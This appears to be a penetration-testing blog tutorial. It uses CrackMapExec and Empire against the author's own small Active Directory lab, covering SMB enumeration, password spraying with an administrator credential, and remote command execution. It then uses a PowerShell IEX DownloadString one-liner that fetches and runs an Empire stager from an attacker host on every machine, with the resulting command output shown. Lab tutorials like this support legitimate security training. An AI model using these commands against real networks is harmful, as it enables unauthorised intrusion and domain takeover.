/ penetration testing

CrackMapExec - Owning Networks at speed of light

Today I'm goingo talk about a really useful tool called CrackMapExec.
This tool's aim is to automate/ease the process of exploiting/post-exploiting Windows networks.
You can find the repository at GitHub at this address: CrackMapExec Repo
It has very nice integrations with Empire and Metasploit that can help you owning a lot of machines with minimal effort.
I'm not going to cover the installation process, it's well detailed in the README.
For this example, we are goint to target a Windows network based on Active Directory, we'll go through the classical steps:

  1. Information Gathering
  2. Password Cracking/Spraying
  3. Getting shells

The infrastructure I build for this test is brain-dead easy, just a domain controller and a Workstation:
ad-1

Let's start with information gathering, we are going to use SMB module for this task.
The syntax is quite easy:

cme <module> <targets>

In this case:

┌─[riccardo@warmachine]─[~]
└──╼ $cme smb 172.28.128.0/24
CME          172.28.128.3:445 DC01            [*] Windows 6.3 Build 9600 (name:DC01) (domain:DOMAIN)
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [*] Windows 10.0 Build 14393 (name:DESKTOP-OA9Q8L2) (domain:DOMAIN)
[*] KTHXBYE!

Schermata-del-2018-03-18-14-41-08

Looks like that we found two hosts with the SMB service active!
In other scenarios I would use something like responder, bettercap or tools like that in order to gain an initial foothold on the network, but since we are exploting CME capabilities we are going to the brute force way (again, not my favourite way)
We can start a brute force attempt using lists or specific usernames passed via command line, for the sake of this exercise we are goint to test with a single-word wordlist :D
The syntax for the brute force is straightforward:

cme smb <targets> -u <usernames> -p <passwords>
┌─[✗]─[riccardo@warmachine]─[~]
└──╼ $cme smb 172.28.128.0/24 -u Administrator -p "1qazxsw2.."
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [*] Windows 10.0 Build 14393 (name:DESKTOP-OA9Q8L2) (domain:DOMAIN)
CME          172.28.128.3:445 DC01            [*] Windows 6.3 Build 9600 (name:DC01) (domain:DOMAIN)
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
CME          172.28.128.3:445 DC01            [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
[*] KTHXBYE!

Schermata-del-2018-03-18-14-47-07
How lucky are we? Administrative credentials that works for every machine!
Can we execute some commands in those machines? Sure we can:

┌─[riccardo@warmachine]─[~]
└──╼ $sudo cme smb 172.28.128.0/24 -u Administrator -p "1qazxsw2.." -x whoami
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [*] Windows 10.0 Build 14393 (name:DESKTOP-OA9Q8L2) (domain:DOMAIN)
CME          172.28.128.3:445 DC01            [*] Windows 6.3 Build 9600 (name:DC01) (domain:DOMAIN)
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
CME          172.28.128.3:445 DC01            [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
CME          172.28.128.3:445 DC01            [+] Executed command 
CME          172.28.128.3:445 DC01            domain\administrator
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [+] Executed command 
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 domain\administrator

Schermata-del-2018-03-18-14-50-39
But that's not enough, isn't it?
For the shells step, I'm not going to use CrackMapExec integration with Empire via REST API, but I'll go for the old-fashoned way:

  1. Generate a powershell stager for Empire and dropped into a ps1 file
  2. Serve the powershell stager via HTTP
  3. Download and execute in memory the stager
  4. Get an Empire session

Generating and Empire listener and stager is quite easy:

(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Host 172.28.128.1:80
(Empire: listeners/http) > execute
[*] Starting listener 'http'
[+] Listener successfully started!
(Empire: listeners/http) > 
(Empire: listeners/http) > back
(Empire: listeners) > usestager multi/launcher
(Empire: stager/multi/launcher) > set Listener http
(Empire: stager/multi/launcher) > set OutFile /tmp/stager.ps1
(Empire: stager/multi/launcher) > execute
[*] Stager output written out to: /tmp/stager.ps1

The payload I used to download the powershell script is also very easy:

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://172.28.128.1:443/stager.ps1')

The final command I used to execute those commands with CME:

┌─[riccardo@warmachine]─[~]
└──╼ $sudo cme smb 172.28.128.0/24 -u Administrator -p "1qazxsw2.." -x "powershell IEX (New-Object System.Net.Webclient).DownloadString('http://172.28.128.1:443/stager.ps1')"
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [*] Windows 10.0 Build 14393 (name:DESKTOP-OA9Q8L2) (domain:DOMAIN)
CME          172.28.128.3:445 DC01            [*] Windows 6.3 Build 9600 (name:DC01) (domain:DOMAIN)
CME          172.28.128.4:445 DESKTOP-OA9Q8L2 [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
CME          172.28.128.3:445 DC01            [+] DOMAIN\Administrator:1qazxsw2.. (Pwn3d!)
[*] KTHXBYE!
[+] Initial agent PWMES1B9 from 172.28.128.3 now active (Slack)
[+] Initial agent G8C1LNBM from 172.28.128.4 now active (Slack)

Ahhh! Lovely words!
Schermata-del-2018-03-18-15-08-38

As we saw, this tools contains no magic, but it can be very useful in very large enviroments!

Happy Hacking!